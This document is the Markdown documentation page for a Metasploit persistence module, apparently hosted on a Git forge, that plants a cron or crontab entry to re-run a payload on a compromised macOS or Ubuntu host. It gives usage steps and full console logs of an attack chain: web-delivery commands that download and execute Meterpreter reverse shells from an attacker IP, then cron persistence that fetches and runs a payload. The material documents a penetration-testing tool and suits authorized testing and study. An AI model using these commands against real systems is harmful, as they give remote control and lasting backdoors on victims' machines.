adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
d2ed326b16ff5dc8f95633e287c19eb467c5ac6c
metasploit-gs/documentation/modules/exploit/multi/persistence/cron.md
T
h00die 785397bb0c cron to multi with persistence mixin
2025-09-09 11:50:31 -04:00

213 lines
9.2 KiB
Markdown
Raw Blame History

## Vulnerable Application
This module will create a cron or crontab entry to execute a payload.
The module includes the ability to automatically clean up those entries to prevent multiple executions.
syslog will get a copy of the cron entry.
Verified on Ubuntu 22.04.1, MacOS 13.7.4
## Verification Steps
1. Start msfconsole
2. Exploit a box via whatever method
3. Do: `use exploit/multi/persistence/cron`
4. Do: `set session #`
5. Do: `set target #`
6. Optional Do: `set username` (depends on target selection)
7. Do: `exploit`
## Options
### USERNAME
Set a specific user's crontab if target 'User Crontab' is selected
### TIMING
Set cron's timing. Default is to run within a minute. Defaults to `* * * * *`
### PAYLOAD_NAME
If using a non-cmd/fetch payload, the name of the payload file. Defaults to random.
## Scenarios
### MacOS 13.7.4
Initial access via web delivery
```
resource (/root/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
[*] Using configured payload python/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set srvport 8181
srvport => 8181
resource (/root/.msf4/msfconsole.rc)> set lport 4545
lport => 4545
resource (/root/.msf4/msfconsole.rc)> set URIPATH l
URIPATH => l
[msf](Jobs:0 Agents:0) exploit(multi/script/web_delivery) > set target 8
target => 8
[msf](Jobs:0 Agents:0) exploit(multi/script/web_delivery) > set payload payload/osx/x64/meterpreter/reverse_tcp
payload => osx/x64/meterpreter/reverse_tcp
[msf](Jobs:0 Agents:0) exploit(multi/script/web_delivery) > exploit
[-] Msf::OptionValidateError One or more options failed to validate: LHOST.
[*] Exploit completed, but no session was created.
[msf](Jobs:0 Agents:0) exploit(multi/script/web_delivery) > set lhost 111.111.1.111
lhost => 111.111.1.111
[msf](Jobs:0 Agents:0) exploit(multi/script/web_delivery) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[msf](Jobs:1 Agents:0) exploit(multi/script/web_delivery) >
[*] Started reverse TCP handler on 0.0.0.0:4545
[*] Using URL: http://111.111.1.111:8181/l
[*] Server started.
[*] Run the following command on the target machine:
curl -sk --output 4aJvtPCb http://111.111.1.111:8181/l; chmod +x 4aJvtPCb; ./4aJvtPCb& disown
[*] Transmitting first stager...(214 bytes)
[*] Transmitting second stager...(49152 bytes)
[*] Sending stage (815032 bytes) to 172.17.0.3
[*] Meterpreter session 1 opened (111.111.1.111:4545 -> 172.17.0.3:49171) at 2025-02-17 17:14:43 -0500
[msf](Jobs:1 Agents:1) exploit(multi/script/web_delivery) > sessions -i 1
[*] Starting interaction with 1...
(Meterpreter 1)(/Users/macos) > sysinfo
Computer : 20.20.20.21
OS : macOS Ventura (macOS 13.7.4)
Architecture : x86
BuildTuple : x86_64-apple-darwin
Meterpreter : x64/osx
(Meterpreter 1)(/Users/macos) > getuid
Server username: macos
(Meterpreter 1)(/Users/macos) > background
[*] Backgrounding session 1...
```
Due to networking issues, persistence payload is a cmd to touch a file.
```
[msf](Jobs:1 Agents:1) exploit(multi/script/web_delivery) > use exploit/multi/persistence/cron
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
[msf](Jobs:1 Agents:1) exploit(multi/persistence/cron) > set target 2
target => 2
[msf](Jobs:1 Agents:1) exploit(multi/persistence/cron) > set payload payload/osx/x64/exec
payload => osx/x64/exec
[msf](Jobs:1 Agents:1) exploit(multi/persistence/cron) > set cmd "/usr/bin/touch /Users/macos/executed_demo"
cmd => /usr/bin/touch /Users/macos/executed_demo
[msf](Jobs:1 Agents:1) exploit(multi/persistence/cron) > set AllowNoCleanup true
AllowNoCleanup => true
[msf](Jobs:1 Agents:1) exploit(multi/persistence/cron) > set user macos
user => macos
[msf](Jobs:1 Agents:1) exploit(multi/persistence/cron) > set writabledir /Users/macos
writabledir => /Users/macos
[msf](Jobs:1 Agents:1) exploit(multi/persistence/cron) > set session 1
session => 1
[msf](Jobs:1 Agents:1) exploit(multi/persistence/cron) > exploit
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[msf](Jobs:2 Agents:1) exploit(multi/persistence/cron) >
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Cron timing is valid, no cron.deny entries found
[*] Writing backdoor to /Users/macos/nGnXw
[*] Writing '/Users/macos/nGnXw' (17204 bytes) ...
[*] Utilizing crontab since we can't write to /var/at/tabs/
[+] Payload will be triggered when cron time is reached
[msf](Jobs:2 Agents:1) exploit(multi/persistence/cron) > sessions -i 1
[*] Starting interaction with 1...
(Meterpreter 1)(/Users/macos) > ls
Listing: /Users/macos
=====================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100400/r-------- 7 fil 2025-02-17 09:22:02 -0500 .CFUserTextEncoding
040700/rwx------ 64 dir 2025-02-17 09:23:29 -0500 .Trash
100600/rw------- 4057 fil 2025-02-17 12:46:46 -0500 .viminfo
100600/rw------- 1291 fil 2025-02-17 17:11:33 -0500 .zsh_history
040700/rwx------ 256 dir 2025-02-17 17:11:33 -0500 .zsh_sessions
100755/rwxr-xr-x 815032 fil 2025-02-17 12:23:58 -0500 2gXD9pz
040700/rwx------ 96 dir 2025-02-17 09:21:18 -0500 Desktop
040700/rwx------ 96 dir 2025-02-17 09:21:18 -0500 Documents
040700/rwx------ 96 dir 2025-02-17 09:21:18 -0500 Downloads
040700/rwx------ 2464 dir 2025-02-17 11:17:13 -0500 Library
040700/rwx------ 96 dir 2025-02-17 09:21:18 -0500 Movies
040700/rwx------ 96 dir 2025-02-17 09:21:18 -0500 Music
040700/rwx------ 128 dir 2025-02-17 11:14:18 -0500 Pictures
040755/rwxr-xr-x 128 dir 2025-02-17 09:21:18 -0500 Public
100644/rw-r--r-- 0 fil 2025-02-17 17:19:00 -0500 executed_demo
100700/rwx------ 17204 fil 2025-02-17 17:18:27 -0500 nGnXw
```
### Ubuntu 22.04.1
Initial access via web delivery
```
resource (/root/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/root/.msf4/msfconsole.rc)> setg lhost 111.111.1.111
lhost => 111.111.1.111
resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
[*] Using configured payload python/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set srvport 8181
srvport => 8181
resource (/root/.msf4/msfconsole.rc)> set target 7
target => 7
resource (/root/.msf4/msfconsole.rc)> set payload payload/linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set lport 4545
lport => 4545
resource (/root/.msf4/msfconsole.rc)> set URIPATH l
URIPATH => l
resource (/root/.msf4/msfconsole.rc)> run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 111.111.1.111:4545
[*] Using URL: http://111.111.1.111:8181/l
[*] Server started.
[*] Run the following command on the target machine:
wget -qO xKgxaWNl --no-check-certificate http://111.111.1.111:8181/l; chmod +x xKgxaWNl; ./xKgxaWNl& disown
[msf](Jobs:1 Agents:0) exploit(multi/script/web_delivery) > [*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 222.222.2.22
[*] Meterpreter session 1 opened (111.111.1.111:4545 -> 222.222.2.22:47100) at 2025-02-17 17:36:07 -0500
[msf](Jobs:1 Agents:1) exploit(multi/script/web_delivery) > sessions -i 1
[*] Starting interaction with 1...
(Meterpreter 1)(/home/ubuntu) > getuid
Server username: ubuntu
(Meterpreter 1)(/home/ubuntu) > sysinfo
Computer : 222.222.2.22
OS : Ubuntu 22.04 (Linux 5.15.0-48-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
(Meterpreter 1)(/home/ubuntu) > background
[*] Backgrounding session 1...
```
Persistence
```
[msf](Jobs:1 Agents:1) exploit(multi/script/web_delivery) > use exploit/multi/persistence/cron
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
[msf](Jobs:1 Agents:1) exploit(multi/persistence/cron) > set session 1
session => 1
[msf](Jobs:1 Agents:1) exploit(multi/persistence/cron) > rexploit
[*] Reloading module...
[*] Command to run on remote host: curl -so ./yMuAETldii http://111.111.1.111:8080/Hg3DGEu9GqlWD06kh4AzFg;chmod +x ./yMuAETldii;./yMuAETldii&
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[msf](Jobs:2 Agents:1) exploit(multi/persistence/cron) >
[*] Fetch handler listening on 111.111.1.111:8080
[*] HTTP server started
[*] Adding resource /Hg3DGEu9GqlWD06kh4AzFg
[*] Started reverse TCP handler on 111.111.1.111:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Cron timing is valid, no cron.deny entries found
[*] Utilizing crontab since we can't write to /var/spool/cron/crontabs
[+] Payload will be triggered when cron time is reached
[*] Client 222.222.2.22 requested /Hg3DGEu9GqlWD06kh4AzFg
[*] Sending payload to 222.222.2.22 (curl/7.81.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 222.222.2.22
[*] Meterpreter session 2 opened (111.111.1.111:4444 -> 222.222.2.22:43108) at 2025-02-17 17:38:02 -0500
[msf](Jobs:2 Agents:2) exploit(multi/persistence/cron) >
```
Reference in New Issue View Git Blame Copy Permalink